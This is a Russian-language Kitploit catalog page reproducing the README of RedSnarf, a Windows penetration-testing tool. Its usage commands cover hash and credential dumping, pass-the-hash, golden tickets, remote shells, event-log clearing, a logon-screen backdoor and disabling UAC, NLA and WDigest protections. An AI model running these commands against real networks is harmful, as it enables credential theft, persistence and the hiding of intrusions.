Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
redsnarf — RedSnarf — это инструмент для пентеста / ред-тиминга, предназначенный для сред Windows. | Kitploit
Инструменты/GitHubGitHub/nccgroup/redsnarf
Взлом паролейПовышение привилегийГенерация полезной нагрузкиЭксплуатацияАнализ хэшейЛатеральное перемещениеСбор информацииПост-эксплуатацияТестирование на ПроникновениеКомандование и УправлениеRed TeamingИнструмент Удаленного Доступа
1.2k23569 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHubnccgroup/redsnarf

redsnarf

RedSnarf — это инструмент для пентеста / ред-тиминга, предназначенный для сред Windows.

РепозиторийСайт
root@kitploit:~
    ______           .____________                     _____  
\______   \ ____   __| _/   _____/ ____ _____ ________/ ____\ 
 |       _// __ \ / __ |\_____  \ /    \\__  \\_  __ \   __\  
 |    |   \  ___// /_/ |/        \   |  \/ __ \|  | \/|  |    
 |____|_  /\___  >____ /_______  /___|  (____  /__|   |__|    
        \/     \/     \/       \/     \/     \/         
                                  [email protected]
                                                  @redsnarf

GitHub license

RedSnarf — это инструмент для пентестинга / red-команд от Ed Williams, предназначенный для извлечения хэшей и учётных данных с рабочих станций, серверов и контроллеров домена Windows с использованием методов, безопасных для OpSec.

Смотрите наш канал на YouTube с видео: https://www.youtube.com/channel/UCDGWRxpHo6d8y6qIeMAXnxQ

Функциональность RedSnarf включает:

• Извлечение локальных SAM-хэшей
• Перечисление пользователей, работающих с повышенными привилегиями системы, и соответствующих паролей lsa secrets
• Извлечение кэшированных учётных данных MS
• Pass-the-hash
• Быстрое определение слабых и подбираемых комбинаций имя пользователя/пароль (по умолчанию administrator/Password01)
• Возможность извлекать хэши в диапазоне адресов
• Распыление хэшей —
Credsfile принимает смесь pwdump, fgdump и простых текстовых имён пользователей и паролей, разделённых пробелом
• Дамп lsass для офлайн-анализа с помощью Mimikatz
• Дамп хэшей контроллера домена с помощью NTDSUtil и извлечение NTDS.dit для локального разбора
• Дамп хэшей контроллера домена методом drsuapi
• Извлечение папки Scripts и Policies с контроллера домена и поиск в ней 'password' и 'administrator'
• Возможность расшифровки хэшей cpassword
• Возможность запуска оболочки на удалённой машине
• Возможность очистки журналов событий (приложение, безопасность, установка или система); (только во внутренней версии)
• Результаты сохраняются по каждому хосту для анализа
• Включение/отключение RDP на удалённой машине
• Изменение порта RDP с 3389 на 443 на удалённой машине
• Включение/отключение NLA на удалённой машине
• Поиск мест, где пользователи вошли в систему на удалённых машинах
• Бэкдор на экране входа Windows
• Включение/отключение UAC на удалённой машине
• Добавлен скрытный mimikatz
• Разбор доменных хэшей
• Определение, какие учётные записи включены/отключены
• Снятие скриншота рабочего стола активного удалённого пользователя
• Запись рабочего стола активного удалённого пользователя
• Расшифровка Windows CPassword
• Расшифровка пароля WinSCP
• Получение SPN пользователя
• Извлечение паролей Wi-Fi с удалённых машин

Использование RedSnarf

Требования:
Impacket v0.9.16-dev — https://github.com/CoreSecurity/impacket.git
CredDump7 — https://github.com/Neohapsis/creddump7
Извлечение lsass с помощью procdump — https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
Netaddr (0.7.12) — pip install netaddr
Termcolor (1.1.0) — pip install termcolor
iconv — используется для локального разбора информации Mimikatz

Показать справку
./redsnarf.py -h
./redsnarf.py --help

Извлечение локальных хэшей

Извлечение локальных хэшей с одной машины, используя слабые локальные учётные данные и очистка журнала безопасности
./redsnarf.py -H ip=10.0.0.50 -uC security

Извлечение локальных хэшей с одной машины, используя слабые локальные учётные данные и очистка журнала приложений
./redsnarf.py -H ip=10.0.0.50 -uC application

Извлечение локальных хэшей с одной машины, используя учётные данные локального администратора
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d .

Извлечение локальных хэшей с одной машины, используя учётные данные администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com

Извлечение хэшей в сетевом диапазоне, используя учётные данные локального администратора
./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d .

Извлечение хэшей в сетевом диапазоне, используя учётные данные администратора домена
./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com

Извлечение хэшей в сетевом диапазоне, используя учётные данные администратора домена
./redsnarf.py -H file=targets.txt -u administrator -p Password01 -d yourdomain.com

Распыление хэшей

Распыление хэшей в сетевом диапазоне
./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d .

Извлечение хэшей в сетевом диапазоне с доменным входом
./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d yourdomain.com

Быстрая проверка учётных данных
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password1 -d . -cQ y

Быстрая проверка файла с именами пользователей (-hS) и общим паролем (-hP)
./redsnarf.py -H ip=10.0.0.1 -hS /path/to/usernames.txt -hP PasswordToTry -cQ y

Извлечение доменных хэшей

Извлечение хэшей методом drsuapi (самый быстрый)
Этот метод поддерживает дополнительный флаг -q y, который запрашивает LDAP и выводит, активны учётные записи или отключены.
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hI y (-hQ y)

Извлечение хэшей с помощью NTDSUtil
Этот метод поддерживает дополнительный флаг -q y, который запрашивает LDAP и выводит, активны учётные записи или отключены.
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hN y (-hQ y)

Генерация золотого билета
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hT y

Сбор информации

Копирование папки Policies и Scripts с контроллера домена и поиск в ней password и administrator
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -uP y

Расшифровка Cpassword
./redsnarf.py -uG cpassword

Поиск пользователя — онлайн
/redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eL user.name

Поиск пользователя — офлайн (поиск по предварительно загруженной информации)
/redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eO user.name

Вывод списка задач NT AUTHORITY\SYSTEM
/redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eT y

Снимок экрана рабочего стола удалённого активного пользователя
/redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eS y

Разное

Запуск оболочки на машине, используя учётные данные локального администратора
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -uD y

Запуск оболочки на машине, используя учётные данные администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uD y

Извлечение копии lsass для офлайн-анализа с Mimikatz на машине, используя учётные данные локального администратора
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -hL y

Запуск скрытного mimikatz; этот вариант запускает веб-сервер для предоставления PowerShell-скрипта, который обфусцирован и закодирован на стороне машины; данные не касаются диска — учётные данные извлекаются в удобном для чтения виде и выводятся на экран.
./redsnarf.py -H ip=192.168.198.162 -u administrator -p Password01 -cS y -hR y

Выполнение произвольной команды
Пример 1
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'net user'

Пример 2 — Двойные кавычки нужно экранировать с помощью \
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'dsquery group -name "domain admins" | dsget group -members -expand'

Политика локального маркера доступа
Создаёт пакетный файл lat.bat, который можно скопировать и вставить на удалённую машину для выполнения; он изменит реестр и включит или отключит параметры политики локального маркера доступа.
./redsnarf.py -rL y

Wdigest
Включение значения реестра UseLogonCredential Wdigest на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW e

Отключение значения реестра UseLogonCredential Wdigest на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW d

Запрос значения реестра UseLogonCredential Wdigest на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW q

UAC
Включение значения реестра UAC на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU e

Отключение значения реестра UAC на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU d

Запрос значения реестра UAC на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU q

Бэкдор — Бэкдор на экране входа Windows — нажмите Left Shift + Left Alt + Print Screen для активации
Включение значения реестра бэкдора на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB e

Отключение значения реестра бэкдора на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB d

Запрос значения реестра бэкдора на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB q

Автовход
Включение значения реестра Windows AutoLogon на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA e

Отключение значения реестра Windows AutoLogon на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA d

Запрос значения реестра Windows AutoLogon на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA q

Блокировка сеанса пользователя на удалённой машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uL y

RDP

Включение RDP на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR e

Отключение RDP на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR d

Запрос статуса RDP на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR q

Изменение порта RDP с 3389 на 443 — Изменить порт RDP на 443 на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT e

Изменение порта RDP на значение по умолчанию 3389 на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT d

Запрос значения порта RDP на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT q

Включение мульти-RDP с Mimikatz
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uR y

Включение RDP SingleSessionPerUser на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM e

Отключение RDP SingleSessionPerUser на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM d

Запрос статуса RDP SingleSessionPerUser на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM q

NLA

Включение NLA на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN e

Отключение NLA на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN d

Запрос статуса NLA на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN q

Скачать инструмент